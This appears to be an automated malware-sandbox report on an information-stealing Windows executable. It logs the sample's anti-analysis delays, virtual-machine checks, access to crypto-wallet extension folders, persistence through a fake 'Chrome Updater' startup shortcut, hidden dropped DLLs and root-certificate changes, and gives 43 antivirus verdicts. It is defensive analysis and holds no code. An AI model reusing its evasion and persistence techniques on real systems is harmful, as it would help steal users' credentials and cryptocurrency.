NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff20000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0xfff20000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0048f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0b040000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0b041000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0b042000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0b043000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:27 a.m.	process_identifier: 1676 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0b044000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

A process attempted to delay the analysis task. (1 event)

description

faintxakers-76060706313.exe tried to sleep 158 seconds, actually delayed analysis time by 158 seconds

Steals private information from local Internet browsers (12 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\odbfpeeihdkbihmopkbjmoonfanlbfcl
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn

Creates executable files on the filesystem (9 events)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk
file	C:\Users\test22\AppData\Local\Temp\EntityFramework.dll
file	C:\Users\test22\AppData\Local\Temp\x64\SQLite.Interop.dll
file	C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.Linq.dll
file	C:\Users\test22\AppData\Local\Temp\EntityFramework.SqlServer.dll
file	C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.dll
file	C:\Users\test22\AppData\Local\Temp\x86\SQLite.Interop.dll
file	C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.EF6.dll
file	C:\Users\test22\AppData\Local\Temp\Ionic.Zip.dll

Creates hidden or system file (6 events)

Time & API	Arguments	Status	Return
SetFileAttributesW March 11, 2023, 10:27 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\Ionic.Zip.dll filepath: C:\Users\test22\AppData\Local\Temp\Ionic.Zip.dll	1	1
SetFileAttributesW March 11, 2023, 10:27 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\EntityFramework.dll filepath: C:\Users\test22\AppData\Local\Temp\EntityFramework.dll	1	1
SetFileAttributesW March 11, 2023, 10:27 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\EntityFramework.SqlServer.dll filepath: C:\Users\test22\AppData\Local\Temp\EntityFramework.SqlServer.dll	1	1
SetFileAttributesW March 11, 2023, 10:27 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.dll filepath: C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.dll	1	1
SetFileAttributesW March 11, 2023, 10:27 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.EF6.dll filepath: C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.EF6.dll	1	1
SetFileAttributesW March 11, 2023, 10:27 a.m.	file_attributes: 2 (FILE_ATTRIBUTE_HIDDEN) filepath_r: C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.Linq.dll filepath: C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.Linq.dll	1	1

Creates a shortcut to an executable file (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk

Drops an executable to the user AppData folder (7 events)

file	C:\Users\test22\AppData\Local\Temp\x86\SQLite.Interop.dll
file	C:\Users\test22\AppData\Local\Temp\EntityFramework.SqlServer.dll
file	C:\Users\test22\AppData\Local\Temp\Ionic.Zip.dll
file	C:\Users\test22\AppData\Local\Temp\EntityFramework.dll
file	C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.Linq.dll
file	C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.dll
file	C:\Users\test22\AppData\Local\Temp\System.Data.SQLite.EF6.dll

Executes one or more WMI queries (2 events)

wmi	Select ProcessorId From Win32_processor
wmi	SELECT ProcessorId FROM Win32_Processor

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses March 11, 2023, 10:27 a.m.	flags: 15 family: 0		111	0

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00027600', u'virtual_address': u'0x00002000', u'entropy': 7.998824790306015, u'name': u'\\x0bZr;I\\x1a\r)', u'virtual_size': u'0x00027568'}

entropy

7.99882479031

description

A section with a high entropy has been found

entropy

0.262718932444

description

Overall entropy of this PE file is high

Executes one or more WMI queries which can be used to identify virtual machines (2 events)

wmi	Select ProcessorId From Win32_processor
wmi	SELECT ProcessorId FROM Win32_Processor

Looks for the Windows Idle Time to determine the uptime (1 event)

Time & API	Arguments	Status	Return	Repeated
NtQuerySystemInformation March 11, 2023, 10:27 a.m.	information_class: 8 (SystemProcessorPerformanceInformation)	1	0	0

Installs itself for autorun at Windows startup (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Chrome Updater.lnk

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Appends a known CryptoMix ransomware file extension to files that have been encrypted (1 event)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet

File has been identified by 43 AntiVirus engines on VirusTotal as malicious (43 events)

Elastic	malicious (high confidence)
MicroWorld-eScan	Gen:Variant.Lazy.309619
FireEye	Generic.mg.628e9b3aa5259602
CAT-QuickHeal	Trojan.YakbeexMSIL.ZZ4
McAfee	Artemis!628E9B3AA525
Malwarebytes	Spyware.FormBook
VIPRE	Gen:Variant.Lazy.309619
Sangfor	Suspicious.Win32.Save.a
CrowdStrike	win/malicious_confidence_90% (D)
Alibaba	TrojanDownloader:MSIL/Seraph.f6e1609a
Arcabit	Trojan.Lazy.D4B973
Cyren	W32/MSIL_Kryptik.JAN.gen!Eldorado
Symantec	ML.Attribute.HighConfidence
ESET-NOD32	a variant of MSIL/Spy.Agent.DXY
Cynet	Malicious (score: 100)
APEX	Malicious
Kaspersky	HEUR:Trojan-Downloader.MSIL.Seraph.gen
BitDefender	Gen:Variant.Lazy.309619
Avast	Win32:SpywareX-gen [Trj]
Rising	Spyware.Agent!8.C6 (CLOUD)
Sophos	Generic ML PUA (PUA)
DrWeb	Trojan.Siggen20.722
McAfee-GW-Edition	BehavesLike.Win32.Infected.jm
Emsisoft	Gen:Variant.Lazy.309619 (B)
Ikarus	Trojan.MSIL.PSW
Webroot	W32.Spyware.Gen
Avira	HEUR/AGEN.1249749
Antiy-AVL	Trojan[Spy]/MSIL.Agent
Gridinsoft	Trojan.Heur!.03013281
Microsoft	Trojan:Win32/Casdet!rfn
ZoneAlarm	HEUR:Trojan-Downloader.MSIL.Seraph.gen
GData	Gen:Variant.Lazy.309619
Google	Detected
AhnLab-V3	Trojan/Win.Generic.R561300
BitDefenderTheta	Gen:NN.ZemsilF.36308.Lu0@ambO4Ro
ALYac	Gen:Variant.Lazy.309619
MAX	malware (ai score=84)
Cylance	unsafe
TrendMicro-HouseCall	TROJ_GEN.R002H0CC923
Tencent	Msil.Trojan-Downloader.Seraph.Cflw
SentinelOne	Static AI - Malicious PE
Fortinet	MSIL/Agent.DXY!tr.spy
AVG	Win32:SpywareX-gen [Trj]

faintxakers-76060706313.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All